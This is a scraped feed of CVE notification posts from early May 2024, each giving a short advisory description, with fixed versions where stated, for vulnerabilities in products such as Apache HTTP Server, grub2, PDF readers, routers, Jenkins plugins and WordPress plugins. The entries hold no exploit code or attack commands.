🚨 CVE-2024-24795HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack.Users are recommended to upgrade to version 2.4.59, which fixes this issue.🎖@cveNotify |
|
| 2024-05-03 03:37:26 |
🚨 CVE-2023-4693An out-of-bounds read flaw was found on grub2's NTFS filesystem driver. This issue may allow a physically present attacker to present a specially crafted NTFS file system image to read arbitrary memory locations. A successful attack allows sensitive data cached in memory or EFI variable values to be leaked, presenting a high Confidentiality risk.🎖@cveNotify |
|
| 2024-05-03 03:37:25 |
🚨 CVE-2023-4692An out-of-bounds write flaw was found in grub2's NTFS filesystem driver. This issue may allow an attacker to present a specially crafted NTFS filesystem image, leading to grub's heap metadata corruption. In some circumstances, the attack may also corrupt the UEFI firmware heap metadata. As a result, arbitrary code execution and secure boot protection bypass may be achieved.🎖@cveNotify |
|
| 2024-05-03 02:37:43 |
🚨 CVE-2023-27340PDF-XChange Editor PNG File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PNG files. Crafted data in a PNG file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18665.🎖@cveNotify |
|
| 2024-05-03 02:37:42 |
🚨 CVE-2023-27338PDF-XChange Editor TIF File Parsing Use-After-Free Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of TIF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-18612.🎖@cveNotify |
|
| 2024-05-03 02:37:41 |
🚨 CVE-2023-27337PDF-XChange Editor PDF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PDF files. Crafted data in a PDF file can trigger a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18494.🎖@cveNotify |
|
| 2024-05-03 02:37:38 |
🚨 CVE-2023-27336Softing edgeConnector Siemens OPC UA Server Null Pointer Dereference Denial-of-Service Vulnerability. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Softing edgeConnector Siemens. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of OPC client certificates. The issue results from dereferencing a NULL pointer. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-20508.🎖@cveNotify |
|
| 2024-05-03 02:37:37 |
🚨 CVE-2023-27333TP-Link Archer AX21 tmpServer Command 0x422 Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer AX21 routers. Authentication is required to exploit this vulnerability.The specific flaw exists within the handling of command 0x422 provided to the tmpServer service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19905.🎖@cveNotify |
|
| 2024-05-03 02:37:36 |
🚨 CVE-2023-27332TP-Link Archer AX21 tdpServer Logging Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer AX21 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the logging functionality of the tdpServer program, which listens on UDP port 20002. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19898.🎖@cveNotify |
|
| 2024-05-03 02:37:32 |
🚨 CVE-2023-27329Foxit PDF Reader Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-19477.🎖@cveNotify |
|
| 2024-05-03 02:37:31 |
🚨 CVE-2023-27327Parallels Desktop Toolgate Time-Of-Check Time-Of-Use Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.The specific flaw exists within the Toolgate component. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system. Was ZDI-CAN-18964.🎖@cveNotify |
|
| 2024-05-03 02:37:26 |
🚨 CVE-2023-27325Parallels Desktop Updater Improper Initialization Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability.The specific flaw exists within the Updater service. The issue results from the lack of proper initialization of environment variables. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-18253.🎖@cveNotify |
|
| 2024-05-03 02:37:25 |
🚨 CVE-2023-27322Parallels Desktop Service Improper Initialization Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability.The specific flaw exists within the Parallels Service. The issue results from the lack of proper initialization of environment variables. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-17751.🎖@cveNotify |
|
| 2024-05-03 01:37:30 |
🚨 CVE-2024-34404A vulnerability was discovered in the Alta Recovery Vault feature of Veritas NetBackup before 10.4 and NetBackup Appliance before 5.4. By design, only the cloud administrator should be able to disable the retention lock of Governance mode images. This vulnerability allowed a NetBackup administrator to modify the expiration of backups under Governance mode (which could cause premature deletion).🎖@cveNotify |
|
| 2024-05-03 01:37:29 |
🚨 CVE-2024-34403An issue was discovered in uriparser through 0.9.7. ComposeQueryMallocExMm in UriQuery.c has an integer overflow via a long string.🎖@cveNotify |
|
| 2024-05-03 01:37:26 |
🚨 CVE-2024-34402An issue was discovered in uriparser through 0.9.7. ComposeQueryEngine in UriQuery.c has an integer overflow via long keys or values, with a resultant buffer overflow.🎖@cveNotify |
|
| 2024-05-03 01:37:25 |
🚨 CVE-2024-34032Delta Electronics DIAEnergie is vulnerable to an SQL injection vulnerability that exists in the GetDIACloudList endpoint. An authenticated attacker can exploit this issue to potentially compromise the system on which DIAEnergie is deployed.🎖@cveNotify |
|
| 2024-05-03 01:37:24 |
🚨 CVE-2024-34031Delta Electronics DIAEnergie is vulnerable to an SQL injection vulnerability that exists in the script Handler_CFG.ashx. An authenticated attacker can exploit this issue to potentially compromise the system on which DIAEnergie is deployed.🎖@cveNotify |
|
| 2024-05-02 23:37:25 |
🚨 CVE-2022-31623MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_compress.cc, when an error occurs (i.e., going to the err label) while executing the method create_worker_threads, the held lock thd->ctrl_mutex is not released correctly, which allows local users to trigger a denial of service due to the deadlock. Note: The vendor argues this is just an improper locking bug and not a vulnerability with adverse effects.🎖@cveNotify |
|
| 2024-05-02 23:37:24 |
🚨 CVE-2022-31622MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_compress.cc, when an error occurs (pthread_create returns a nonzero value) while executing the method create_worker_threads, the held lock is not released correctly, which allows local users to trigger a denial of service due to the deadlock. Note: The vendor argues this is just an improper locking bug and not a vulnerability with adverse effects.🎖@cveNotify |
|
| 2024-05-02 21:37:30 |
🚨 CVE-2024-30305Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-02 21:37:26 |
🚨 CVE-2024-30304Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-02 21:37:25 |
🚨 CVE-2024-30301Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-02 21:37:24 |
🚨 CVE-2024-25047IBM Cognos Analytics 11.2.0 through 11.2.4 and 12.0.0 through 12.0.2 is vulnerable to injection attacks in application logging by not sanitizing user provided data. This could lead to further attacks against the system. IBM X-Force ID: 282956.🎖@cveNotify |
|
| 2024-05-02 20:37:24 |
🚨 CVE-2024-4140An excessive memory use issue (CWE-770) exists in Email-MIME, before version 1.954, which can cause denial of service when parsing multipart MIME messages. The patch set (from 2020 and 2024) limits excessive depth and the total number of parts.🎖@cveNotify |
|
| 2024-05-02 19:37:26 |
🚨 CVE-2024-34394libxmljs2 is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking the namespaces() function (which invokes XmlNode::get_local_namespaces()) on a grand-child of a node that refers to an entity. This vulnerability can lead to denial of service and remote code execution.🎖@cveNotify |
|
| 2024-05-02 19:37:25 |
🚨 CVE-2024-34391libxmljs is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking a function on the result of attrs() that was called on a parsed node. This vulnerability might lead to denial of service (on both 32-bit systems and 64-bit systems), data leak, infinite loop and remote code execution (on 32-bit systems with the XML_PARSE_HUGE flag enabled).🎖@cveNotify |
|
| 2024-05-02 19:37:24 |
🚨 CVE-2024-33396An issue in karmada-io karmada v1.9.0 and before allows a local attacker to execute arbitrary code via a crafted command to get the token component.🎖@cveNotify |
|
| 2024-05-02 18:37:24 |
🚨 CVE-2024-33394An issue in kubevirt kubevirt v1.2.0 and before allows a local attacker to execute arbitrary code via a crafted command to get the token component.🎖@cveNotify |
|
| 2024-05-02 18:07:42 |
🚨 CVE-2024-4406Xiaomi Pro 13 GetApps integral-dialog-page Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xiaomi Pro 13 smartphones. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the integral-dialog-page.html file. When parsing the integralInfo parameter, the process does not properly sanitize user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22332.🎖@cveNotify |
|
| 2024-05-02 18:07:41 |
🚨 CVE-2024-4029A vulnerability was found in Wildfly’s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.🎖@cveNotify |
|
| 2024-05-02 18:07:37 |
🚨 CVE-2023-47727IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 and IBM QRadar Suite Software 1.10.12.0 through 1.10.20.0 could allow an authenticated user to modify dashboard parameters due to improper input validation. IBM X-Force ID: 272089.🎖@cveNotify |
|
| 2024-05-02 18:07:36 |
🚨 CVE-2024-3543Use of reversible password encryption algorithm allows attackers to decrypt passwords. Sensitive information can be easily unencrypted by the attacker, stolen credentials can be used for arbitrary actions to corrupt the system.🎖@cveNotify |
|
| 2024-05-02 18:07:35 |
🚨 CVE-2024-34148Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier programmatically disables the fix for CVE-2016-3721 whenever a build is triggered from a release tag, by setting the Java system property 'hudson.model.ParametersAction.keepUndefinedParameters'.🎖@cveNotify |
|
| 2024-05-02 18:07:32 |
🚨 CVE-2024-34147Jenkins Telegram Bot Plugin 1.4.0 and earlier stores the Telegram Bot token unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.🎖@cveNotify |
|
| 2024-05-02 18:07:31 |
🚨 CVE-2024-34145A sandbox bypass vulnerability involving sandbox-defined classes that shadow specific non-sandbox-defined classes in Jenkins Script Security Plugin 1335.vf07d9ce377a_e and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.🎖@cveNotify |
|
| 2024-05-02 18:07:30 |
🚨 CVE-2024-34061changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-02 18:07:26 |
🚨 CVE-2024-33303SourceCodester Product Show Room 1.0 is vulnerable to Cross Site Scripting (XSS) via "First Name" under Add Users.🎖@cveNotify |
|
| 2024-05-02 18:07:25 |
🚨 CVE-2024-30251aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. In affected versions an attacker can send a specially crafted POST (multipart/form-data) request. When the aiohttp server processes it, the server will enter an infinite loop and be unable to process any further requests. An attacker can stop the application from serving requests after sending a single request. This issue has been addressed in version 3.9.4. Users are advised to upgrade. Users unable to upgrade may manually apply a patch to their systems. Please see the linked GHSA for instructions.🎖@cveNotify |
|
| 2024-05-02 17:37:44 |
🚨 CVE-2024-1348The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JS parameter in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-02 17:37:43 |
🚨 CVE-2024-0848The AA Cash Calculator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘invoice’ parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-02 17:37:42 |
🚨 CVE-2024-0847The 5280 Bootstrap Modal Contact Form plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation in class-sbmm-list-table.php. This makes it possible for unauthenticated attackers to bulk delete messages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-02 17:37:39 |
🚨 CVE-2024-0710The GP Unique ID plugin for WordPress is vulnerable to Unique ID Modification in all versions up to, and including, 1.5.5. This is due to insufficient input validation. This makes it possible for unauthenticated attackers to tamper with the generation of a unique ID on a form submission and replace the generated unique ID with a user-controlled one, leading to a loss of integrity in cases where the ID's uniqueness is relied upon in a security-specific context.🎖@cveNotify |
|
| 2024-05-02 17:37:38 |
🚨 CVE-2024-0615The Content Control – The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.0 via the API. This makes it possible for unauthenticated attackers to extract post titles, IDs, slugs, statuses and other information including post content. This includes published content only.🎖@cveNotify |
|
| 2024-05-02 17:37:37 |
🚨 CVE-2023-7067The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +10 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'woolentor_template_store' function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with contributor access and above to access the nonce used to access this function and set a blank template as the default template.🎖@cveNotify |
|
| 2024-05-02 17:37:33 |
🚨 CVE-2023-7030The Collapse-O-Matic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'expand' shortcode in all versions up to, and including, 1.8.5.5 due to insufficient input sanitization and output escaping on the 'tag' user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-02 17:37:32 |
🚨 CVE-2023-6961The WP Meta SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘Referer’ header in all versions up to, and including, 4.5.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-02 17:37:31 |
🚨 CVE-2023-6731The WP Show Posts plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple AJAX functions in all versions up to, and including, 1.1.5. This makes it possible for authenticated attackers, with subscriber access and above, to view arbitrary post metadata, list posts, and view terms and taxonomies.🎖@cveNotify |
|
| 2024-05-02 17:37:27 |
🚨 CVE-2023-6214The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.6 via the purchased_products function. This makes it possible for unauthenticatied attackers to extract sensitive data including the previous 7 days of order data including products and customer PII.🎖@cveNotify |
|
| 2024-05-02 17:37:26 |
🚨 CVE-2022-44023PwnDoc through 0.5.3 might allow remote attackers to identify disabled user account names by leveraging response messages for authentication attempts.🎖@cveNotify |
|
| 2024-05-02 17:37:25 |
🚨 CVE-2020-13654XWiki Platform before 12.8 mishandles escaping in the property displayer.🎖@cveNotify |
|
| 2024-05-02 16:37:36 |
🚨 CVE-2024-4433Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mr Digital Simple Image Popup allows Stored XSS.This issue affects Simple Image Popup: from n/a through 2.4.0.🎖@cveNotify |
|
| 2024-05-02 16:37:35 |
🚨 CVE-2024-33530In Jitsi Meet before 9391, a logic flaw in password-protected Jitsi meetings (that make use of a lobby) leads to the disclosure of the meeting password when a user is invited to a call after waiting in the lobby.🎖@cveNotify |
|
| 2024-05-02 16:37:31 |
🚨 CVE-2024-31966A vulnerability on Mitel 6800 Series and 6900 Series SIP Phones, including 6970 Conference Unit, through 6.3 SP3 HF4 allows an authenticated attacker with administrative privilege to conduct an argument injection attack due to insufficient parameter sanitization. A successful exploit could allow an attacker to access sensitive information, modify the system configuration, or execute arbitrary commands.🎖@cveNotify |
|
| 2024-05-02 16:37:30 |
🚨 CVE-2024-31964A vulnerability on Mitel 6800 Series and 6900 Series SIP Phones, including 6970 Conference Unit, through 6.3 SP3 HF4 allows an unauthenticated attacker to conduct an authentication bypass attack due to improper authentication control. A successful exploit could allow an attacker to modify system configuration settings and potentially cause a denial of service.🎖@cveNotify |
|
| 2024-05-02 16:37:26 |
🚨 CVE-2024-29309An issue in Alfresco Content Services v.23.3.0.7 allows a remote attacker to execute arbitrary code via the Transfer Service.🎖@cveNotify |
|
| 2024-05-02 16:37:25 |
🚨 CVE-2024-33775An issue with the Autodiscover component in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted Dashlet.🎖@cveNotify |
|
| 2024-05-02 16:37:24 |
🚨 CVE-2022-35503Improper verification of a user input in Open Source MANO v7-v12 allows an authenticated attacker to execute arbitrary code within the LCM module container via a Virtual Network Function (VNF) descriptor. An attacker may be able execute code to change the normal execution of the OSM components, retrieve confidential information, or gain access other parts of a Telco Operator infrastructure other than OSM itself.🎖@cveNotify |
|
| 2024-05-02 15:37:33 |
🚨 CVE-2024-4406Xiaomi Pro 13 GetApps integral-dialog-page Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xiaomi Pro 13 smartphones. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the integral-dialog-page.html file. When parsing the integralInfo parameter, the process does not properly sanitize user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22332.🎖@cveNotify |
|
| 2024-05-02 15:37:32 |
🚨 CVE-2024-4405Xiaomi Pro 13 mimarket manual-upgrade Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xiaomi Pro 13 smartphones. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the manual-upgrade.html file. When parsing the manualUpgradeInfo parameter, the process does not properly sanitize user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22379.🎖@cveNotify |
|
| 2024-05-02 15:37:28 |
🚨 CVE-2024-4029A vulnerability was found in Wildfly’s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.🎖@cveNotify |
|
| 2024-05-02 15:37:27 |
🚨 CVE-2023-47727IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 and IBM QRadar Suite Software 1.10.12.0 through 1.10.20.0 could allow an authenticated user to modify dashboard parameters due to improper input validation. IBM X-Force ID: 272089.🎖@cveNotify |
|
| 2024-05-02 15:37:26 |
🚨 CVE-2024-30251aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. In affected versions an attacker can send a specially crafted POST (multipart/form-data) request. When the aiohttp server processes it, the server will enter an infinite loop and be unable to process any further requests. An attacker can stop the application from serving requests after sending a single request. This issue has been addressed in version 3.9.4. Users are advised to upgrade. Users unable to upgrade may manually apply a patch to their systems. Please see the linked GHSA for instructions.🎖@cveNotify |
|
| 2024-05-02 14:37:43 |
🚨 CVE-2024-4128This vulnerability was a potential CSRF attack. When running the Firebase emulator suite, there is an export endpoint that is used normally to export data from running emulators. If a user was running the emulator and navigated to a malicious website with the exploit on a browser that allowed calls to localhost (ie Chrome before v94), the website could exfiltrate emulator data. We recommend upgrading past version 13.6.0 or commit 068a2b08dc308c7ab4b569617f5fc8821237e3a0 https://github.com/firebase/firebase-tools/commit/068a2b08dc308c7ab4b569617f5fc8821237e3a0🎖@cveNotify |
|
| 2024-05-02 14:37:39 |
🚨 CVE-2024-34148Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier programmatically disables the fix for CVE-2016-3721 whenever a build is triggered from a release tag, by setting the Java system property 'hudson.model.ParametersAction.keepUndefinedParameters'.🎖@cveNotify |
|
| 2024-05-02 14:37:38 |
🚨 CVE-2024-34146Jenkins Git server Plugin 114.v068a_c7cc2574 and earlier does not perform a permission check for read access to a Git repository over SSH, allowing attackers with a previously configured SSH public key but lacking Overall/Read permission to access these repositories.🎖@cveNotify |
|
| 2024-05-02 14:37:37 |
🚨 CVE-2024-34145A sandbox bypass vulnerability involving sandbox-defined classes that shadow specific non-sandbox-defined classes in Jenkins Script Security Plugin 1335.vf07d9ce377a_e and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.🎖@cveNotify |
|
| 2024-05-02 14:37:33 |
🚨 CVE-2024-34061changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-02 14:37:32 |
🚨 CVE-2024-33305SourceCodester Laboratory Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via "Middle Name" parameter in Create User.🎖@cveNotify |
|
| 2024-05-02 14:37:31 |
🚨 CVE-2024-33303SourceCodester Product Show Room 1.0 is vulnerable to Cross Site Scripting (XSS) via "First Name" under Add Users.🎖@cveNotify |
|
| 2024-05-02 14:37:30 |
🚨 CVE-2024-33302SourceCodester Product Show Room 1.0 and before is vulnerable to Cross Site Scripting (XSS) via "Middle Name" under Add Users.🎖@cveNotify |
|
| 2024-05-02 14:37:27 |
🚨 CVE-2024-30251aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. In affected versions an attacker can send a specially crafted POST (multipart/form-data) request. When the aiohttp server processes it, the server will enter an infinite loop and be unable to process any further requests. An attacker can stop the application from serving requests after sending a single request. This issue has been addressed in version 3.9.4. Users are advised to upgrade. Users unable to upgrade may manually apply a patch to their systems. Please see the linked GHSA for instructions.🎖@cveNotify |
|
| 2024-05-02 14:37:26 |
🚨 CVE-2023-37244The affected AutomationManager.AgentService.exe application contains a TOCTOU race condition vulnerability that allows standard users to create a pseudo-symlink at C:\ProgramData\N-Able Technologies\AutomationManager\Temp, which could be leveraged by an attacker to manipulate the process into performing arbitrary file deletions. We recommend upgrading to version 2.91.0.0🎖@cveNotify |
|
| 2024-05-02 14:37:25 |
🚨 CVE-2022-35503Improper verification of a user input in Open Source MANO v7-v12 allows an authenticated attacker to execute arbitrary code within the LCM module container via a Virtual Network Function (VNF) descriptor. An attacker may be able execute code to change the normal execution of the OSM components, retrieve confidential information, or gain access other parts of a Telco Operator infrastructure other than OSM itself.🎖@cveNotify |
|
| 2024-05-02 14:37:24 |
🚨 CVE-2016-3721Jenkins before 2.3 and LTS before 1.651.2 might allow remote authenticated users to inject arbitrary build parameters into the build environment via environment variables.🎖@cveNotify |
|
| 2024-05-02 13:37:43 |
🚨 CVE-2024-3481The Counter Box WordPress plugin before 1.2.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such deleting counters via CSRF attacks🎖@cveNotify |
|
| 2024-05-02 13:37:42 |
🚨 CVE-2024-3477The Popup Box WordPress plugin before 2.2.7 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting popups via CSRF attacks🎖@cveNotify |
|
| 2024-05-02 13:37:41 |
🚨 CVE-2024-3476The Side Menu Lite WordPress plugin before 4.2.1 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks🎖@cveNotify |
|
| 2024-05-02 13:37:37 |
🚨 CVE-2024-3474The Wow Skype Buttons WordPress plugin before 4.0.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks🎖@cveNotify |
|
| 2024-05-02 13:37:36 |
🚨 CVE-2024-3471The Button Generator WordPress plugin before 3.0 does not have CSRF check in place when bulk deleting, which could allow attackers to make a logged in admin delete buttons via a CSRF attack🎖@cveNotify |
|
| 2024-05-02 13:37:35 |
🚨 CVE-2024-2405The Float menu WordPress plugin before 6.0.1 does not have CSRF check in its bulk actions, which could allow attackers to make logged in admin delete arbitrary menu via a CSRF attack.🎖@cveNotify |
|
| 2024-05-02 13:37:32 |
🚨 CVE-2023-51631D-Link DIR-X3260 prog.cgi SetUsersSettings Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability.The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21675.🎖@cveNotify |
|
| 2024-05-02 13:37:31 |
🚨 CVE-2021-36593Oxwall 1.8.7 (11111) is vulnerable to Incorrect Access Control. Unauthenticated file upload allows an attacker to upload image files.🎖@cveNotify |
|
| 2024-05-02 13:37:30 |
🚨 CVE-2024-33423Cross-Site Scripting (XSS) vulnerability in the Settings menu of CMSimple v5.15 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Logout parameter under the Language section.🎖@cveNotify |
|
| 2024-05-02 13:37:26 |
🚨 CVE-2024-33306SourceCodester Laboratory Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via "First Name" parameter in Create User.🎖@cveNotify |
|
| 2024-05-02 13:37:25 |
🚨 CVE-2023-46294An issue was discovered in Teledyne FLIR M300 2.00-19. User account passwords are encrypted locally, and can be decrypted to cleartext passwords using the utility umSetup. This utility requires root permissions to execute.🎖@cveNotify |
|
| 2024-05-02 11:37:30 |
🚨 CVE-2024-3005The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's LaStudioKit Post Author widget in all versions up to, and including, 1.3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-02 11:37:26 |
🚨 CVE-2024-33922Insertion of Sensitive Information into Log File vulnerability in Jordy Meow WP Media Cleaner.This issue affects WP Media Cleaner: from n/a through 6.7.2.🎖@cveNotify |
|
| 2024-05-02 11:37:25 |
🚨 CVE-2024-33911Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar School Management Pro.This issue affects School Management Pro: from n/a through 10.3.4.🎖@cveNotify |
|
| 2024-05-02 11:37:24 |
🚨 CVE-2024-31390Improper Control of Generation of Code ('Code Injection') vulnerability in Soflyy Breakdance allows : Code Injection.This issue affects Breakdance: from n/a through 1.7.1.🎖@cveNotify |
|
| 2024-05-02 08:37:24 |
🚨 CVE-2024-3280The Follow Us Badges plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsite_follow_us_badges shortcode in all versions up to, and including, 3.1.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-02 07:37:24 |
